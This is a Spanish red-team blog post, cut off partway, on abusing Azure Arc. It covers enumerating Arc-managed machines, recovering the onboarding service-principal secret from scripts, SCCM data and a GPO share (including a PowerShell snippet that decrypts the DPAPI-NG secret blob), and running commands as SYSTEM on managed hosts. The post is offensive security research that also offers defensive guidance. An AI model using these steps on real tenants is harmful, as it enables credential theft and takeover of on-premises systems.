Identificación y uso abusivo de Azure Arc para escalado híbrido y persistencia

Primer plano lateral de un hombre encorvado sobre un ordenador en un espacio de oficina oscuro

Introducción

Mi investigación sobre Microsoft Azure comenzó durante una reciente operación del equipo rojo en la que nos encontramos con un script de PowerShell que contenía un secreto de la entidad de servicio codificado que era responsable de implementar Arc en los sistemas de las instalaciones. No sabía mucho sobre el servicio, así que comencé a investigar un poco para determinar qué podíamos hacer con las credenciales recuperadas. Terminamos siendo capaces de utilizar técnicas documentadas en investigaciones anteriores sobre este tema para obtener la ejecución de código en un controlador de dominio y volver a pivotar en Microsoft Azure, pero esto me hizo pensar en algunas cuestiones más amplias relacionadas con Arc: ¿Cómo se identifica en entornos? ¿Qué (malas) configuraciones podrían existir que permitieran la escalada? ¿Qué otros vectores de ejecución de código existen dentro de él? ¿Podría utilizarse como un mecanismo de persistencia fuera de banda?

Entonces, ¿qué es Azure Arc? A un alto nivel, amplía las capacidades de gestión nativas de Azure a una variedad de Recursos que no son de Azure, como sistemas en las instalaciones, clústeres de Kubernetes e implementaciones de VCenter, lo que permite que estos sistemas se gestionen a través de Resource Manager de la misma manera que lo haría un host nativo de Azure. Una vez que el agente de Arc se implementa en un host, registra el recurso subyacente en Azure y expone un conjunto de características de gestión: supervisión, aplicación de políticas, gestión de actualizaciones, etc. Sin embargo, lo que más me interesó fue la posibilidad de utilizarlo para descargar archivos de forma remota y ejecutar comandos desde un proceso de confianza en el contexto de NT_AUTHORITY\SYSTEM.  Aunque parte de la funcionalidad de Arc se solapa con Intune, Arc está diseñado específicamente para gestionar infraestructuras y servidores, no para endpoints o dispositivos móviles.

Arc no es muy nuevo (se lanzó originalmente en 2019), y otras investigaciones anteriores han descrito cómo se puede utilizar para ejecutar código y persistir en entornos. Además, la investigación existente sobre el ataque a las máquinas virtuales (VM) de Azure se solapa significativamente con Arc, ya que los sistemas de las instalaciones configurados con Arc se pueden gestionar en Azure de forma muy similar a una máquina virtual nativa de Azure. Con este blog, espero proporcionar un poco más de contexto centrándome en áreas no exploradas tan a fondo en la investigación existente, así como describiendo el uso ofensivo de la plataforma dentro de un flujo de trabajo típico de red teaming y proporcionando orientación defensiva complementaria para las implementaciones de Azure Arc .

Proceso de implementación Azure Arc

Antes de dedicarme a atacar Arc, lo configuré en un tenant de prueba para entender mejor cómo funciona el servicio y cómo es el proceso de implementación. Como Arc es un servicio de Azure, requiere una suscripción y un grupo de recursos en sentido descendente al que adjuntar los recursos gestionados; el acceso también se gestiona posteriormente a través de roles de control de acceso basado en roles (RBAC) de Azure asignados en estos ámbitos. Si desea configurar esto en su propio laboratorio, una nota adicional: deberá registrarse con los siguientes proveedores de recursos en su suscripción en Suscripciones -> (su suscripción) -> Configuración -> Proveedores de recursos:

  • Microsoft.HybridCompute
  • Microsoft.GuestConfiguration
  • Microsoft.HybridConnectivity

Una vez cumplidos estos requisitos previos, se puede utilizar una cuenta con los roles adecuados asignados en la suscripción asociada a Arc para acceder al servicio, donde se encuentra con una ventana de gestión general.

captura de pantalla de la ventana de resumen de la gestión de Arc
Fig. 1: ventana de resumen de la gestión de Arc

Como aún no hemos implementado Arc en ninguna parte, saltaremos inmediatamente a la interfaz Añadir recursos. Este menú contiene opciones de implementación y descubrimiento para una variedad de tipos de dispositivos, pero el interés más inmediato es la funcionalidad de Máquina que nos permite administrar servidores de Windows y Linux alojados fuera del tenant actual de Azure. Al hacer clic aquí, se muestran varias opciones para una implementación de un solo host o varios.

captura de pantalla de las opciones de implementación de Arc
Fig. 2: opciones de implementación de Arc

Dentro de esta interfaz, las opciones Servidor único y Windows Server con instalador son más adecuadas para implementaciones puntuales, y las opciones AWS o Gestión de actualizaciones se centran más en dispositivos nativos de la nube ya gestionados a través de Azure o AWS. En este caso, la que más nos interesa es la opción de implementación de varios servidores, ya que probablemente sea la ruta más común que utilizaría un administrador de TI en un escenario de implementación empresarial híbrido.

Al hacer clic en la opción de varios servidores, el flujo de trabajo de implementación plantea a continuación una serie de preguntas básicas sobre la suscripción, el grupo de Recursos y la región a los que conectar los dispositivos gestionados por Arc. Todo es bastante sencillo hasta el final de esta página, donde se nos da la instrucción de usar una entidad de servicio para el registro del dispositivo durante esta implementación. El siguiente bloque de texto básicamente solo indica que necesita una entidad de servicio configurada con el rol de incorporación de máquinas conectadas de Azure para realizar una implementación, y también le da la opción de crear una nueva entidad de servicio con el rol apropiado asignado.

captura de pantalla de la configuración de entidad de servicio dentro de la configuración de implementación de varios servidores
Fig. 3: configuración de entidad de servicio dentro de la configuración de implementación de varios servidores

En este caso, crearemos una nueva entidad de servicio Test_Arc_SP para nuestra implementación.

captura de pantalla que muestra la creación de ua nueva entidad de servicio para la implementación de Arc
Fig. 4: creación de una nueva entidad de servicio para la implementación de Arc

Esta interfaz de creación pregunta a continuación qué roles asignamos a nuestra nueva entidad de servicio. Podemos seleccionar cualquiera de las opciones, incluido el curiosamente llamado Azure Connected Machine Resource Administrator, sin ningún contexto adicional ni advertencias sobre los privilegios que estos roles confieren.

Asignación de funciones como parte de la creación de la entidad de servicio
Fig. 5: asignación de funciones como parte de la creación de la entidad de servicio

Por último, se nos presenta uno de los cuatro mecanismos compatibles para implementar Arc en hosts en las instalaciones, como se puede ver en la imagen a continuación. Vamos a tratar cada uno de estos temas con un poco más de profundidad en la sección Obtener acceso a Arc que se encuentra más abajo.

captura de pantalla de las opciones compatibles para las implementaciones de Arc con varios hosts
Fig. 6: opciones admitidas para implementaciones de Arc con varios hosts

Una vez que Arc se implemente a través del tipo de instalación elegido y se conecte de nuevo a Azure, el nuevo sistema cliente aparecerá en Azure Arc -> Recursos de Azure Arc.

captura de pantalla de la ventana de inventario de Arc que muestra la incorporación exitosa de wks1-1
Fig. 7: ventana de inventario de Arc que muestra la incorporación exitosa de wks1-1

Identificación de Azure Arc en un entorno

Al pensar en el uso ofensivo de Arc, la primera pregunta que me hice fue: "Cuando entro en un entorno empresarial híbrido, ¿qué reconocimiento puedo realizar para determinar si Arc está en uso?" Estos indicadores se pueden dividir en gran medida en dos categorías: Azure y de las instalaciones.

Azure

El acceso a Arc se controla a través de Azure RBAC, lo que significa que el acceso al servicio e incluso la visibilidad básica de su uso están en gran medida fuera del alcance de los objetos no asignados a ningún rol en una suscripción asociada a una implementación de Arc. Dicho esto, todavía hay algunos métodos indirectos que pueden permitirnos determinar si Arc está en uso e incluso en qué sistemas es probable que esté instalado que puedan ser identificados por un usuario de Entra sin privilegios. Al seguir los pasos del proceso de implementación anterior, hay varios puntos en los que se agregan o modifican objetos dentro de Microsoft Entra que se pueden observar para determinar si Arc está en uso dentro de un tenant.

En primer lugar, cuando se configura una suscripción en un tenant Azure con los Recursos necesarios para Arc (por ejemplo, Microsoft.HybridCompute), se crearán dos entidades de servicio llamadas Servicio de token de Arc y Arc nube pública – Servidores. Esto no significa necesariamente que Arc se haya implementado dentro de una organización, sino que al menos una suscripción en un tenant se ha configurado de manera que el servicio sea compatible. Un ejemplo de esto se puede ver a continuación en un nuevo tenant de Azure, antes y después de configurar los proveedores de recursos necesarios para Arc.

Búsqueda de entidades de servicio asociadas a Arc antes de configurar un tenant para Arc
Fig. 8: búsqueda de entidades de servicio asociadas a Arc antes de configurar un tenant para Arc
Búsqueda de entidades de servicio asociadas a Arc después de configurar un tenant para Arc
Fig. 9: búsqueda de entidades de servicio asociadas a Arc después de configurar un tenant para Arc

Continuando con el proceso de implementación, se utiliza una entidad de servicio para unir los dispositivos a Arc, como se detalla en el proceso de implementación tratado en la sección anterior. Puede ser una entidad de servicio existente anteriormente a la que se le hayan asignado manualmente las funciones de RBAC necesarias, o una entidad de servicio generada automáticamente creada a través de la interfaz de implementación de Arc. Si un administrador creara una entidad de servicio directamente a través de Arc, Azure la configura automáticamente con la etiqueta AzureArcSPN, que un usuario de Entra sin privilegios puede buscar directamente desde la línea de comandos de Azure o desde los resultados de la recopilación de ROADrecon  y AzureHound. Aunque no proporciona pruebas concretas de que Arc haya sido realmente implementado, una entidad de servicios configurada de esta manera mostraría que un administrador en este tenant ha interactuado al menos con los pasos del proceso de implementación de Arc. A continuación se muestra un ejemplo de creación de una entidad de servicio a través de Arc, así como los datos de etiquetas identificables resultantes recopilados por ROADrecon.

Etiqueta AzureArcSPN que indica una entidad de servicio creada durante el proceso de implementación en Arc
Fig. 10: etiqueta AzureArcSPN que indica una entidad de servicio creada durante el proceso de implementación en Arc

Por último, cuando un sistema se incorpora a Arc, se crea una identidad gestionada dentro de Entra para la máquina y se le pueden otorgar roles tanto en Entra como en Azure como cualquier otra entidad de servicio. Dado que esta identidad gestionada está presente en Entra, de forma predeterminada, una entidad sin privilegios puede enumerar los sistemas incorporados en Arc filtrando los datos de reconocimiento de Azure recopilados para buscar dispositivos con un ResourceID que contenga Microsoft.HybridCompute (tenga en cuenta que esto es diferente de un dispositivo híbrido-unido dentro de Entra y no debería producir ningún falso positivo). Si tiene acceso a la línea de comandos de Azure, este proceso es bastante sencillo, utilizando el siguiente comando:

az ad sp list --filter "servicePrincipalType eq 'ManagedIdentity'" --query
"[?alternativeNames[?contains(@, 'Microsoft.HybridCompute')]].{Name: displayName,
ResourceID: alternativeNames[?contains(@, 'Microsoft.HybridCompute')]|[0]}" --output table
Identificación de clientes de Arc en un tenant de Azure basado en el identificador Microsoft.HybridCompute
Fig. 11: identificación de clientes de Arc en un tenant de Azure basado en el identificador Microsoft.HybridCompute

Esta cadena larga de ResourceID también tiene el beneficio añadido de contener el ID de suscripción y el grupo de recursos al que está asociado el sistema, lo que permite identificar múltiples implementaciones de Arc que abarcan diferentes entornos.

Como alternativa, si ha recopilado datos de Azure a través de ROADrecon o AzureHound, puede analizar Resultados para identificar objetos gestionados por Arc. Dentro de ROADrecon, la información pertinente se almacena dentro del ResourceID, y dentro de los archivos de colección JSON de AzureHound, la misma información se almacena dentro del atributo AlternativeNames. Aunque no parece que este atributo se copie en BloodHound o no sea accesible directamente, la búsqueda directa en el archivo JSON puede permitir la recuperación de una lista completa de objetos gestionados.

Análisis del output de RoadRecon para identificar un cliente de Arc
Fig. 12: análisis output de RoadRecon para identificar un cliente de Arc
Análisis del output bruto de AzureHound para identificar clientes de Arc
Fig. 13: análisis output bruto de AzureHound para identificar clientes de Arc

On-premises

Los indicadores en las instalaciones de la implementación de Arc se dividen en una de dos categorías: localhost y red. Cuando el cliente de Arc se instala en un sistema, creará la carpeta C:\Program Files\AzureConnectedMachineAgent, que contiene todos los archivos pertinentes relacionados con el cliente de Arc. La presencia de esta carpeta, así como de procesos y servicios relacionados con Arc (por ejemplo, gc_arc_service.exe o arcproxy.exe), pueden proporcionar algunas cosas sencillas de comprobar. Además, según el mecanismo de implementación utilizado para llevar el cliente de Arc a los sistemas de la red, es posible que haya algunas cosas adicionales que buscar. Por ejemplo, si Arc se implementa a través de GPO, el proceso de configuración crea un GPO autogenerado denominado [MSFT] Azure Arc Servers Onboarding(DateTimeOfGPOCreation).

GPO de implementación de Arc generado automáticamente
Fig. 14: GPO de implementación de Arc generado automáticamente

Obtener acceso a Azure Arc

Entonces, si hemos identificado que Arc está en uso en un entorno, ¿cómo podemos acceder a él? Para responder a esa pregunta, es importante comprender primero qué constituye específicamente el acceso que nos interesaría. Como el objetivo principal del acceso suele ser ejecutar código en un endpoint gestionado, trabajar hacia atrás desde permisos que permiten la ejecución de código hasta los roles de Azure que otorgan esos permisos puede ser un buen punto de partida para cuentas y roles que nos puedan interesar. Mirando hacia atrás en investigaciones anteriores de Benedikt Strobl en NSIDE Attack Logic, vemos que podemos ejecutar una consulta de PowerShell que obtendrá todos los roles que otorgan permisos que habilitan al menos un mecanismo de ejecución de código a través de Arc (más información sobre los detalles de estos mecanismos en la siguiente sección). La consulta y el output se pueden ver a continuación:

az role definition list --query "[?(!isCustom && (contains(permissions[0].actions,
'Microsoft.HybridCompute/machines/extensions/write') || contains(permissions[0].actions,
'Microsoft.HybridCompute/machines/extensions/*') || contains(permissions[0].actions,
'Microsoft.GuestConfiguration/guestConfigurationAssignments/write') || contains(permissions[0].actions,
'Microsoft.GuestConfiguration/*/write') || contains(permissions[0].actions,
'Microsoft.GuestConfiguration/guestConfigurationAssignments/*') || contains(permissions[0].actions
'Microsoft.HybridCompute/machines/*/write') || contains(permissions[0].actions,
'Microsoft.HybridCompute/machines/*') || contains(permissions[0].actions,
'Microsoft.HybridCompute/*/write') || contains(permissions[0].actions, '*/write') || contains(permissions[0].actions, '*')))].{DisplayName:roleName, Actions:permissions[0].actions}" --output table

 

Roles que otorgan la capacidad de ejecutar código en clientes gestionados por Arc al menos por una vía
Fig. 15: roles que otorgan la capacidad de ejecutar código en clientes gestionados por Arc al menos por una vía

Además de algunos roles extraños que sobresalen, como Colaborador de Análisis de Logs, uno de los más interesantes es el rol de Administrador de recursos de máquinas conectadas de Azure. Si recuerda la sección anterior del proceso de implementación de Azure Arc, este era uno de los roles que se podían asignar a la entidad de servicio creada durante el proceso de implementación de Arc.

Asignación de funciones a una nueva identidad de servicio para la implementación de Arc. No haga clic en el botón de administración, aunque realmente quisiera hacerlo
Fig. 16: asignación de funciones a una nueva entidad de servicio para la implementación de Arc. No haga clic en el botón de administración, aunque realmente quisiera hacerlo

Básicamente, esto pone a la entidad de servicio de implementación, que por necesidad probablemente tendrá su secreto accesible en la red de las instalaciones, a una sola casilla de verificación (una casilla de verificación que no tiene advertencia ni contexto adicional sobre el riesgo) lejos de ser un administrador dentro de Arc. Una entidad de servicio con este rol administrativo asignado inadvertidamente durante la creación no solo podría utilizarse para registrar nuevos clientes de Arc en Azure, sino también para ejecutar comandos en cualquier cliente de Arc instalado. Fue esta omisión comprensible la que identificamos y nos beneficiamos durante nuestra reciente evaluación, permitiéndonos escalar privilegios a través de Arc y hacernos cargo del entorno de las instalaciones del cliente.

Esta entidad de servicio de implementación parece ser un buen objetivo inicial, especialmente si no tienes los privilegios necesarios para obtener listados de otras cuentas con los otros roles mencionados que les asignan ejecución de código. Pero ¿cómo intentarías acceder a ella? En primer lugar, y probablemente de forma más directa, si tiene una ruta dentro de Entra para obtener acceso a una entidad de servicio asociada a Arc añadiéndole un secreto (por ejemplo, propietario de la entidad de servicio, administrador de la aplicación, etc.) podría modificarla directamente el objeto y luego usarlo para autenticarse, lo que podría permitirle obtener acceso privilegiado a Arc. Más allá de esto, los mecanismos de implementación que utiliza Arc también pueden estar mal configurados o permitir la escalada via recuperación del secreto de la entidad de servicio de implementación. A continuación analizaremos cada uno de los cuatro principales mecanismos de implementación empresarial compatibles con Arc para identificar las posibles rutas de escalación que comprobar.

Script básico

El método de implementación predeterminado y más básico para Arc es mediante la descarga de un script de PowerShell generado automáticamente que un administrador de TI puede ejecutar en varios sistemas. Este script extrae el instalador MSI pertinente del sitio web de Microsoft y, posteriormente, realiza la configuración de seguimiento para conectar el cliente instalado al tenant de Azure correcto. De forma algo divertida, el mecanismo de autenticación por defecto soportado dentro de este script auto-generado es codificar de forma fija el secreto de la entidad de servicio que se está usando para la implementación en el script.

Script predeterminado generado por Arc para implementaciones multihost
Fig. 17: script predeterminado generado por Arc para implementaciones multihost

Como este mecanismo de implementación es tan sencillo, no hay mucho que hacer para obtener acceso aparte de estar atento durante el reconocimiento normal de recursos compartidos de archivos para scripts de PowerShell con el nombre de script predeterminado OnboardingScript.ps1, así como scripts con nombres o contenido relacionado con Arc.

Gestor de configuración

Al seleccionar Gestor de configuración para la implementación, se genera un script de PowerShell idéntico al anterior, con la principal diferencia de que Arc proporciona orientación adicional sobre cómo implementar el script directamente a través del System Center Configuration Manager (SCCM) de Microsoft, ya sea mediante una ejecución directa del script o como una secuencia de tareas.

Pasos de implementación específicos de SCCM, recomendando la implementación a través de un script SCCM o una secuencia de tareas
Fig. 18: pasos de implementación específicos de SCCM, recomendando la implementación a través de un script SCCM o una secuencia de tareas

Aunque estos son los dos mecanismos recomendados para la implementación, un administrador de TI puede utilizar alternativamente algún otro mecanismo de implementación a través de SCCM, como la instalación de un paquete o una aplicación. Independientemente de la opción de implementación en uso, es importante tener en cuenta el concepto de colecciones dentro de SCCM, que sirven como ámbito de objetivo para la implementación de secuencias de tareas y (opcionalmente) scripts. Intentar recuperar datos SCCM de un host aleatorio en el entorno probablemente no produzca grandes resultados porque si el host no es miembro de la colección adecuada, no podrá recuperar la información pertinente en la mayoría de los casos. En su lugar, moverse primero lateralmente a un host que se haya identificado como un cliente Arc (o incluso mejor, un punto de gestión SCCM o un servidor de base de datos) y, a continuación, realizar el reconocimiento SCCM probablemente tendrá mejores resultados.

Gestor de configuración: script

El gestor de configuración de SCCM contiene funciones que permiten a los administradores ejecutar scripts de PowerShell en sistemas gestionados. El cliente SCCM no extrae los scripts de la misma manera que las secuencias de tareas o los paquetes; más bien, se envían a demanda desde el servidor a los sistemas cliente. Para probar esto, podemos crear un script simple en el Administrador de configuración de SCCM utilizando el script de implementación de Arc generado automáticamente. Dejaremos el secreto sin resolver por ahora, ya que el sistema en el que estamos implementando ya tiene Arc instalado.

Creación de un script SCCM para implementar Arc
Fig. 19: creación de un script SCCM para implementar Arc

Cuando el script se implemente a través de SCCM, se copiará en el directorio C:\Windows\CCM\ScriptStore en el sistema cliente y se configurará con una lista de control de acceso discrecional (DACL) que restringe el acceso solo a NT_AUTHORITY\SYSTEM, antes de ser ejecutado por el cliente SCCM. Los archivos de esta carpeta se limpian periódicamente en función de las configuraciones específicas de la instancia, pero definitivamente vale la pena comprobar si este u otros scripts pueden contener datos confidenciales.

Ejecución del script de implementación contra clientes SCCM. Tenga en cuenta el GUID que comienza con 4909*
Fig. 20: ejecución del script de implementación contra clientes SCCM. Tenga en cuenta el GUID que comienza con 4909*
Script de PowerShell creado en el sistema cliente SCCM con GUID 4909* coincidente
Fig. 21: script de PowerShell creado en el sistema cliente SCCM con GUID 4909* coincidente
DACL en este script que restringe el acceso a NT_AUTHORITY\SYSTEM
Fig. 22: DACL en este script que restringe el acceso a NT_AUTHORITY\SYSTEM
El contenido de este script de PowerShell en el cliente SCCM incluye el script completo implementado originalmente a través de SCCM
Fig. 23: el contenido de este script de PowerShell en el cliente SCCM incluye el script completo implementado originalmente a través de SCCM

Como alternativa, si obtiene acceso a la base de datos de SCCM, puede recuperar directamente todos los scripts creados en SCCM utilizando el módulo ScriptData en SQLRecon. A continuación se muestra un ejemplo del output de la ejecución de ese módulo en la base de datos del sitio para una instancia de SCCM configurada con un script para implementar Arc.

Recuperación del script SCCM utilizado para implementar Arc desde la base de datos del sitio SCCM con SQLRecon
Fig. 24: recuperación del script SCCM utilizado para implementar Arc desde la base de datos del sitio SCCM con SQLRecon

Siendo realistas, la implementación VIA un script SCCM probablemente no sea muy factible en la práctica, ya que la ejecución del script SCCM es un proceso manual y puntual. Si se ponen en línea nuevos servidores y es necesario agregarlos a Arc en cualquier momento en el futuro, un administrador tendría que recordar volver a entrar y volver a ejecutar el script para aplicarlo a sistemas adicionales.

Gestor de configuración: secuencia de tareas

Un proceso de implementación más automatizado y escalable se haría a través de una secuencia de tareas aplicada a una colección SCCM. Para probar este mecanismo, podemos crear una secuencia de tareas simple que ejecute el script de implementación de Arc e implementarlo en una colección SCCM que contenga un sistema desde el que estemos ejecutando.

Implementación de Arc a través de la secuencia de tareas SCCM
Fig. 25: implementación de Arc a través de la secuencia de tareas SCCM

Tras implementar este script, podemos ejecutar el comando get secrets en SharpSCCM para recuperar secuencias de tareas accesibles que contienen scripts, ya que las políticas que contienen scripts tienen añadida la marca secreta.

Recuperación de la secuencia de tareas que contiene el script de implementación de Arc mediante SharpSCCM
Fig. 26: recuperación de la secuencia de tareas que contiene el script de implementación de Arc mediante SharpSCCM

La propiedad SourceScript dentro de la política pertinente contiene una representación b64 del script original que se está pasando. Volver a convertirlo en texto plano nos permite recuperar el script original.

Descodificación del script recuperado a texto sin formato
Fig. 27: descodificación del script recuperado a texto sin formato

De forma similar a las opciones disponibles al recuperar un script, si tenemos acceso a la base de datos del sitio SCCM, también podemos recuperar directamente los datos de la secuencia de tareas mediante SQLRecon.

Recuperanción de la secuencia de tareas utilizada para implementar Arc desde la base de datos del sitio SCCM con SQLRecon
Fig. 28: recuperación de la secuencia de tareas utilizada para implementar Arc desde la base de datos del sitio SCCM con SQLRecon

Política de grupo

El despliegue de Arc a través de Group Policy es un poco más complicado que los dos mecanismos anteriores y consta de varios pasos que comienzan con la configuración de un recurso compartido de red al que el script, ejecutado a través de un objeto de Group Policy (GPO), puede apuntar. La guía oficial indica que todos los ordenadores del dominio deben tener acceso de lectura y escritura a este recurso compartido, lo que significa que si se utiliza este mecanismo de implementación, el secreto de la entidad de servicio debería poder recuperarse de cualquier contexto NT_AUTHORITY\SYSTEM del dominio.

Pasos de implementación específicos de GPO, que solicitan la creación de un recurso compartido de red y la descarga de un paquete de instalación
Fig. 29: pasos de implementación específicos de GPO, que solicitan la creación de un recurso compartido de red y la descarga de un paquete de instalación

Después de configurar el recurso compartido y descargar y copiar el MSI del cliente de Arc, el próximo paso consiste en descargar un repositorio de GitHub que contiene scripts de PowerShell y DLLs asociadas que se usan para crear automáticamente la GPO.

Pasos de implementación específicos del GPO, que solicitan la descarga de los archivos que se utilizarán durante la creación del GPO
Fig. 30: pasos de implementación específicos del GPO, que solicitan la descarga de los archivos que se utilizarán durante la creación del GPO

Por último, se genera un script de PowerShell que llama a los archivos descargados de GitHub, con argumentos basados en la ubicación del recurso compartido de implementación de Arc configurado previamente.

Comando que ejecutará un administrador una vez completada toda la configuración previa para crear el GPO de implementación de Arc
Fig. 31: comando que ejecutará un administrador una vez completada toda la configuración previa para crear el GPO de implementación de Arc

La ejecución de este script de PowerShell resultante hará que se cree un GPO, que crea una tarea programada que instala el cliente de Arc utilizando los archivos alojados en el recurso compartido de red de implementación y lo conecta a Azure. Este GPO puede vincularse posteriormente a una unidad organizativa (OU) que contenga sistemas para implementar Arc.

Contenido del GPO de implementación de Arc resultante que crea una tarea programada responsable de implementar Arc en los sistemas
Fig. 32: contenido del GPO de implementación de Arc resultante que crea una tarea programada responsable de implementar Arc en los sistemas

Si se identifica un GPO que coincida con esta convención de nombres durante el reconocimiento estándar de Active Directory, los archivos GPO se pueden revisar para determinar la ubicación de la red compartida que contiene los archivos de implementación.

GPO de implementación de Arc con un GUID que comienza con 5C25
Fig. 33: GPO de implementación de Arc con un GUID que comienza con 5C25
Archivo de configuración de tareas programadas enviado por el GPO de implementación de Arc, que contiene la ruta al script de implementación de Arc
Fig. 34: archivo de configuración de tareas programadas enviado por el GPO de implementación de Arc, que contiene la ruta al script de implementación de Arc

Con algún tipo de acceso en el contexto de NT_AUTHORITY\SYSTEM, este recurso compartido se puede navegar de forma remota (si se crea con el acceso predeterminado/recomendado por MS), que tendrá el siguiente aspecto:

Archivos contenidos en el recurso compartido de archivos de implementación de Arc
Fig 35: archivos contenidos en el recurso compartido de archivos de implementación de Arc

Lo más interesante es el archivo encryptedServicePrincipalSecret , con un nombre muy llamativo. Al echar un vistazo al script EnableAzureArc.ps1 muestra que este secreto es un blob cifrado mediante DPAPI-NG.

Código de PowerShell responsable de recuperar el secreto de la entidad de servicio mediante el descifrado del blob DPAPI-NG
Fig. 36: código de PowerShell responsable de recuperar el secreto de la entidad de servicio mediante el descifrado del blob DPAPI-NG

DPAPI-NG (o Cryptographic Próxima Generación [CNG] DPAPI) permite no solo la funcionalidad de cifrado y descifrado DPAPI específica del usuario o de la máquina, sino que también permite operaciones basadas en las membresías de un objeto. Por ejemplo, en este caso, el blob DPAPI-NG dentro de encryptedServicePrincipalSecret está configurado para permitir que cualquier miembro del grupo de equipos del dominio lo descifre. Reuní un script de PowerShell súper simple como prueba de concepto, pero debería ser bastante sencillo traducir el código de AzureArcDeployment.psm1 (que en sí mismo es solo un contenedor alrededor del código .NET) en un ensamblado que se puede ejecutar en memoria en una baliza en el contexto de NT_AUTHORITY\SYSTEM para recuperar y descifrar el secreto.

Descifrado del blob DPAPI-NG para recuperar el secreto de la entidad de servicio de texto sin formato
Fig. 37: descifrado del blob DPAPI-NG para recuperar el secreto de la entidad de servicio de texto sin formato
        $SourceFilesFullPath = "\\Path\to\Arc\Deploy\Folder"
        $workfolder = "C:\Windows\temp"
        Copy-Item (Join-Path $SourceFilesFullPath "AzureArcDeployment.psm1") $workfolder -
Force
        Import-Module (Join-Path $workfolder "AzureArcDeployment.psm1")
        $encryptedSecret = Get-Content (Join-Path $SourceFilesFullPath
encryptedServicePrincipalSecret)
        $sps = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)

Por último, el resto de la información pertinente sobre la conexión, como el ID de la entidad de servicio, el ID de la suscripción, etc., se puede encontrar en el archivo ArcInfo.json que también se encuentra en el mismo recurso compartido de implementación.

Contenido del archivo ArcInfo.json
Fig. 38: contenido del archivo ArcInfo.json

Ansible

La última opción oficial de implementación genera una guía de estrategias de Ansible muy similar a los scripts de PowerShell mencionados anteriormente. Los detalles sobre cómo atacar Ansible variarán bastante según la configuración y el entorno, y como resultado, no profundizaremos más en este mecanismo de implementación.

captura de pantalla de la implementación de Arc mediante Ansible
Fig. 39: implementación de Arcmediante Ansible

Una nota sobre las implementaciones de Linux

Aunque Arc permite la gestión de hosts Linux, los métodos de implementación disponibles directamente en el módulo de servidor Arc en Azure se inclinan en gran medida hacia dispositivos basados en Windows. Las implementaciones de Linux se respaldan mediante el uso de un script bash, pero, de manera similar a las implementaciones de Ansible, es probable que tengan un grado mucho mayor de variación cuando se aplican en un entorno empresarial.

Ejecutar código mediante Azure Arc

De ahora en adelante, supongamos que hemos recuperado correctamente el secreto de una entidad de servicio y que esta entidad de servicio (u otra cuenta recuperada) tiene privilegios de ejecución en Arc. Dado que el propósito de Arc es exponer los dispositivos en las instalaciones al plano de control de Azure, una variedad de primitivas de ejecución de código normalmente asociadas con las máquinas virtuales de Azure entran en el alcance para obtener acceso a los hosts en las instalaciones que tienen instalado el cliente de Arc. Sin embargo, centrarse en las vías de ejecución que solo requieren los permisos específicos de Arc mencionados anteriormente ofrece dos amplias categorías de acciones de ejecución: ejecutar comandos y adiciones o modificaciones de extensiones. Ambos vectores de ejecución funcionan de forma prácticamente idéntica a una ejecución equivalente contra una máquina virtual de Azure y han sido documentados extensamente por otros en blogs y herramientas anteriores, por lo que no profundizaremos demasiado en ellos más allá del uso operativo y algunas peculiaridades interesantes que no están tan ampliamente documentadas.

Comando de ejecución

El comando de ejecución es una especie de pseudoextensión que comparte muchas de las características en disco y los detalles del árbol de ejecución con otras extensiones, pero se instala automáticamente junto con Arc y no aparece en la lista de extensiones instaladas de un sistema gestionado. Esta capacidad permite una forma sencilla de ejecutar comandos en un cliente gestionado a través de Arc, siendo el principal requisito previo que la versión del cliente sea >= 1.33. Puede verificar esto con el comando az connectedmachine show, como se muestra a continuación.

Output del comando az connectedmachine show, que indica una versión > 1.33
Fig. 40: output del comando az connectedmachine show, que indica una versión > 1.33

Tenga en cuenta que intentar ejecutar un comando a través de la línea de comandos az (CLI) requiere no solo los permisos de escritura mencionados anteriormente, sino también privilegios de lectura en el grupo de recursos, que por defecto una entidad de servicio auto-generada no tendrá. Como resultado, al intentar ejecutar un comando directamente desde la CLI de az se produce un error.

Intentar usar la CLI de az para ejecutar un comando en un cliente gestionado da como resultado un error
Fig. 41: intentar usar la CLI de az para ejecutar un comando en un cliente gestionado da como resultado un error

Esto se puede omitir interactuando directamente con la API REST de Azure, aunque no será posible recuperar la salida de los comandos ejecutados. En este ejemplo, crearemos un trabajo de ejecución llamado run-notepad que simplemente inicia notepad.exe en el sistema cliente.

Ejecución del mismo comando desde la API REST de az
Fig. 42: ejecución del mismo comando desde la API REST de az

El comando que se pasa se escribe en un script de PowerShell en la carpeta C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows\[version]\Downloads, con un nombre correspondiente al nombre del trabajo de ejecución creado dentro de Arc y, en última instancia, se ejecutan en el contexto de NT_AUTHORITY\SYSTEM.

Script escrito en el sistema cliente de Arc como resultado de la ejecución del comando de ejecución
Fig. 43: script escrito en el sistema cliente de Arc como resultado de la ejecución del comando de ejecución
Árbol de procesos del comando de ejecución de Arc: el proceso ejecutado (6848) es un elemento secundario de powershell.exe (9048) que finaliza después de crear el elemento secundario
Fig. 44: árbol de procesos del comando de ejecución de Arc: el proceso ejecutado (6848) es un elemento secundario de powershell.exe (9048) que finaliza después de crear el elemento secundario

Este script de PowerShell no se elimina automáticamente al finalizar la ejecución, aunque las ejecuciones adicionales de un trabajo de ejecución con el mismo nombre harán que se elimine el script original y se cree uno nuevo con un sufijo iterado, como se ve a continuación.

Trabajo de ejecución actualizado ejecutando ahora calc en lugar de bloc de notas, borra el script anterior y crea uno nuevo con un sufijo iterado
Fig. 45: trabajo de ejecución actualizado ejecutando ahora calc en lugar de bloc de notas, borra el script anterior y crea uno nuevo con un sufijo iterado

Además de este script, se crean varios otros archivos en el disco durante la ejecución de cada comando de ejecución. Estos se tratarán en mayor profundidad en la sección Orientación defensiva.

Además, tenga en cuenta que un comando de ejecución crea un objeto dentro de Azure que debe eliminarse posteriormente una vez completada la ejecución. Como esta acción no se lee a nivel de grupo de recursos, puede ejecutarse directamente a través de la CLI de az.

Eliminación del objeto asociado a un comando de ejecución creado anteriormente
Fig. 46: Eliminación del objeto asociado a un comando de ejecución creado previamente

Extensiones

Los clientes de Arc pueden aumentar su funcionalidad mediante la instalación de una variedad de extensiones aprobadas por Microsoft, de manera similar a las máquinas virtuales de Azure. La extensión de la que se abusa con más frecuencia es la Custom Script Extension (CSE) para Windows, que permite tanto la ejecución de comandos arbitrarios como la descarga de archivos de Internet. Sin embargo, otras extensiones ofrecen diferentes árboles de ejecución que pueden ayudar a evadir una detección estática centrada en la ejecución de un CSE. A continuación echaremos un vistazo tanto a la ejecución mediante CSE como a la extensión del Centro de Administración de Windows.

Extensión de script personalizada

